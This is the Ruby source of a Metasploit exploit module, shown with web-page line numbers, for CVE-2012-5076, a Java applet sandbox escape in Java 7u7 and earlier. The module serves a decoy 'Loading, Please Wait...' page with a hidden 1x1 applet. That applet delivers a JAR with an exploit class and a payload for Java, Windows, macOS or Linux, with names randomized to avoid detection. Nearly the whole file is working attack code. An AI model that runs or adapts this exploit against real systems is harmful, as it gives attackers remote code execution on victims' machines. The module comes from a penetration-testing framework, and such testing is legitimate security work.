Path: blob/master/modules/exploits/multi/browser/java_jre17_glassfish_averagerangestatisticimpl.rb
19591 views
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Exploit::Remote6Rank = ExcellentRanking78include Msf::Exploit::Remote::HttpServer::HTML9include Msf::Exploit::EXE1011# include Msf::Exploit::Remote::BrowserAutopwn12# autopwn_info({ :javascript => false })1314def initialize(info = {})15super(16update_info(17info,18'Name' => 'Java Applet AverageRangeStatisticImpl Remote Code Execution',19'Description' => %q{20This module abuses the AverageRangeStatisticImpl from a Java Applet to run21arbitrary Java code outside of the sandbox, a different exploit vector than the one22exploited in the wild in November of 2012. The vulnerability affects Java version237u7 and earlier.24},25'License' => MSF_LICENSE,26'Author' => [27'Unknown', # Vulnerability discovery at security-explorations28'juan vazquez' # Metasploit module29],30'References' => [31[ 'CVE', '2012-5076' ],32[ 'OSVDB', '86363' ],33[ 'BID', '56054' ],34[ 'URL', 'http://www.oracle.com/technetwork/topics/security/javacpuoct2012-1515924.html' ],35[ 'URL', 'https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2012-5076' ],36[ 'URL', 'http://www.security-explorations.com/materials/se-2012-01-report.pdf' ]37],38'Platform' => %w{java linux osx win},39'Payload' => { 'Space' => 20480, 'DisableNops' => true },40'Targets' => [41[42'Generic (Java Payload)',43{44'Platform' => ['java'],45'Arch' => ARCH_JAVA,46}47],48[49'Windows x86 (Native Payload)',50{51'Platform' => 'win',52'Arch' => ARCH_X86,53}54],55[56'Mac OS X x86 (Native Payload)',57{58'Platform' => 'osx',59'Arch' => ARCH_X86,60}61],62[63'Linux x86 (Native Payload)',64{65'Platform' => 'linux',66'Arch' => ARCH_X86,67}68],69],70'DefaultTarget' => 0,71'DisclosureDate' => '2012-10-16',72'Notes' => {73'Reliability' => UNKNOWN_RELIABILITY,74'Stability' => UNKNOWN_STABILITY,75'SideEffects' => UNKNOWN_SIDE_EFFECTS76}77)78)79end8081def setup82path = File.join(Msf::Config.data_directory, "exploits", "cve-2012-5076_2", "Exploit.class")83@exploit_class = File.open(path, "rb") { |fd| fd.read(fd.stat.size) }84path = File.join(Msf::Config.data_directory, "exploits", "cve-2012-5076_2", "B.class")85@loader_class = File.open(path, "rb") { |fd| fd.read(fd.stat.size) }8687@exploit_class_name = rand_text_alpha("Exploit".length)88@exploit_class.gsub!("Exploit", @exploit_class_name)89super90end9192def on_request_uri(cli, request)93print_status("handling request for #{request.uri}")9495case request.uri96when /\.jar$/i97jar = payload.encoded_jar98jar.add_file("#{@exploit_class_name}.class", @exploit_class)99jar.add_file("B.class", @loader_class)100metasploit_str = rand_text_alpha("metasploit".length)101payload_str = rand_text_alpha("payload".length)102jar.entries.each { |entry|103entry.name.gsub!("metasploit", metasploit_str)104entry.name.gsub!("Payload", payload_str)105entry.data = entry.data.gsub("metasploit", metasploit_str)106entry.data = entry.data.gsub("Payload", payload_str)107}108jar.build_manifest109110send_response(cli, jar, { 'Content-Type' => "application/octet-stream" })111when /\/$/112payload = regenerate_payload(cli)113if not payload114print_error("Failed to generate the payload.")115send_not_found(cli)116return117end118send_response_html(cli, generate_html, { 'Content-Type' => 'text/html' })119else120send_redirect(cli, get_resource() + '/', '')121end122end123124def generate_html125html = %Q|<html><head><title>Loading, Please Wait...</title></head>|126html += %Q|<body><center><p>Loading, Please Wait...</p></center>|127html += %Q|<applet archive="#{rand_text_alpha(8)}.jar" code="#{@exploit_class_name}.class" width="1" height="1">|128html += %Q|</applet></body></html>|129return html130end131end132133134